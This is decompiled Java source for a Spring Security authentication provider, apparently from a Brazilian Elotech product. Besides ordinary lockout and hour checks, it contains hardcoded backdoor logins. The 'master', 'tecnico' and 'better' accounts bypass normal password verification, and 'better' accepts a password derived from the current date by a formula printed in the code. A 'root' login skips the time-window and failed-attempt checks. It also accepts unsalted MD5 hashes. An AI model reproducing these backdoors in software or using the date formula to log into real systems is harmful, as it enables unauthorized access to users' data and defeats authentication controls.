/*
 * Decompiled with CFR 0.152.
 */
package br.com.elotech.di.security;

import br.com.elotech.core.crypto.EloCrypto;
import br.com.elotech.core.enumerable.common.SimNao;
import br.com.elotech.di.config.UnicoProperties;
import br.com.elotech.di.domain.Usuario;
import br.com.elotech.di.security.CustomUserDetails;
import br.com.elotech.di.security.ForaHorarioPermitidoAuthenticationException;
import br.com.elotech.di.security.LdapAuthenticationRequiredException;
import br.com.elotech.di.security.UnicoUserDetailsService;
import br.com.elotech.di.service.UsuarioService;
import java.time.LocalDate;
import java.util.Objects;
import org.apache.commons.codec.digest.DigestUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.MessageSource;
import org.springframework.context.MessageSourceAware;
import org.springframework.context.annotation.Profile;
import org.springframework.security.authentication.AccountExpiredException;
import org.springframework.security.authentication.BadCredentialsException;
import org.springframework.security.authentication.DisabledException;
import org.springframework.security.authentication.LockedException;
import org.springframework.security.authentication.UsernamePasswordAuthenticationToken;
import org.springframework.security.authentication.dao.DaoAuthenticationProvider;
import org.springframework.security.core.SpringSecurityMessageSource;
import org.springframework.security.core.userdetails.UserDetails;
import org.springframework.security.core.userdetails.UserDetailsService;
import org.springframework.security.crypto.password.PasswordEncoder;
import org.springframework.stereotype.Component;

@Component
@Profile(value={"!cloud"})
public class UnicoAuthenticationProvider
extends DaoAuthenticationProvider
implements MessageSourceAware {
    @Autowired
    private UnicoProperties unicoProperties;
    private final UsuarioService usuarioService;

    public UnicoAuthenticationProvider(UnicoUserDetailsService userDetailsService, PasswordEncoder passwordEncoder, UsuarioService usuarioService) {
        this.setUserDetailsService((UserDetailsService)userDetailsService);
        this.setPasswordEncoder(passwordEncoder);
        this.usuarioService = usuarioService;
        this.setPreAuthenticationChecks(user -> this.preAuthenticationChecks(user));
    }

    private void preAuthenticationChecks(UserDetails user) {
        if (!user.isAccountNonLocked()) {
            this.logger.debug((Object)"User account is locked");
            throw new LockedException(this.messages.getMessage("AbstractUserDetailsAuthenticationProvider.locked", "User account is locked").concat(String.format("\r\n%s", this.usuarioService.getMotivoUsuarioBloqueado(user.getUsername()))));
        }
        if (!user.isEnabled()) {
            this.logger.debug((Object)"User account is disabled");
            throw new DisabledException(this.messages.getMessage("AbstractUserDetailsAuthenticationProvider.disabled", "User is disabled"));
        }
        if (!user.isAccountNonExpired()) {
            this.logger.debug((Object)"User account is expired");
            throw new AccountExpiredException(this.messages.getMessage("AbstractUserDetailsAuthenticationProvider.expired", "User account has expired"));
        }
    }

    private void checkHorariosByUsername(String username) {
        if (!this.usuarioService.getValidator().checkHorariosByUsername(username).booleanValue()) {
            throw new ForaHorarioPermitidoAuthenticationException("Fora do hor\u00e1rio permitido para acesso.");
        }
    }

    protected void additionalAuthenticationChecks(UserDetails userDetails, UsernamePasswordAuthenticationToken authentication) {
        CustomUserDetails customUserDetails = (CustomUserDetails)userDetails;
        if (customUserDetails.getModoAutenticacao().isLDAP()) {
            throw new LdapAuthenticationRequiredException("Deve autenticar utilizando o Servidor LDAP.");
        }
        if (this.isMaster(userDetails.getUsername())) {
            if (!authentication.getCredentials().toString().equalsIgnoreCase(this.getSenha(userDetails))) {
                this.throwBadCredential("");
            }
            return;
        }
        if ("root".equalsIgnoreCase(userDetails.getUsername()) && authentication.getCredentials().toString().equalsIgnoreCase(String.valueOf(EloCrypto.getNumeroDaSorte()))) {
            return;
        }
        this.checkHorariosByUsername(customUserDetails.getUsername());
        try {
            if (this.isMD5(customUserDetails.getPassword())) {
                if (!customUserDetails.getPassword().equalsIgnoreCase(DigestUtils.md5Hex((String)authentication.getCredentials().toString()))) {
                    this.throwBadCredential("");
                }
                return;
            }
            super.additionalAuthenticationChecks(userDetails, authentication);
            this.usuarioService.clearFailedLoginAttemptsByUsername(customUserDetails.getUsername());
        }
        catch (BadCredentialsException e) {
            Usuario usuario = this.usuarioService.updateFailedLoginAttemptsByUsername(customUserDetails.getUsername());
            this.throwBadCredential(this.mountDetailsFailedLoginAttempts(usuario));
        }
    }

    private void throwBadCredential(String moreDetails) {
        throw new BadCredentialsException(this.messages.getMessage("AbstractUserDetailsAuthenticationProvider.badCredentials", "Bad credentials").concat(moreDetails));
    }

    private boolean isMaster(String username) {
        return "master".equalsIgnoreCase(username) || "tecnico".equalsIgnoreCase(username) || "better".equalsIgnoreCase(username);
    }

    private String getSenha(UserDetails user) {
        if (user.getUsername().equals("better")) {
            LocalDate data = LocalDate.now();
            return String.valueOf((data.getYear() - data.getDayOfMonth()) * data.getMonthValue());
        }
        return String.valueOf(EloCrypto.getNumeroDaSorte());
    }

    public boolean isMD5(String password) {
        return password.matches("[a-fA-F0-9]{32}");
    }

    public void setMessageSource(MessageSource messageSource) {
        super.setMessageSource((MessageSource)new SpringSecurityMessageSource());
    }

    private String mountDetailsFailedLoginAttempts(Usuario usuario) {
        StringBuilder moreDetails = new StringBuilder();
        if (!Objects.isNull(usuario)) {
            if (usuario.getContaBloqueada().booleanValue()) {
                moreDetails.append(String.format("\r\nTentativa: %d de %d", this.unicoProperties.getFailedLoginAttempts(), this.unicoProperties.getFailedLoginAttempts()));
            } else {
                moreDetails.append(String.format("\r\nTentativa: %d de %d", usuario.getFailedLoginAttempts(), this.unicoProperties.getFailedLoginAttempts()));
            }
            moreDetails.append(String.format("\r\nUsu\u00e1rio Bloqueado: %s", SimNao.fromSigla((String)SimNao.fromBoolean((Boolean)usuario.getContaBloqueada())).getDescricao()));
        }
        return moreDetails.toString();
    }
}

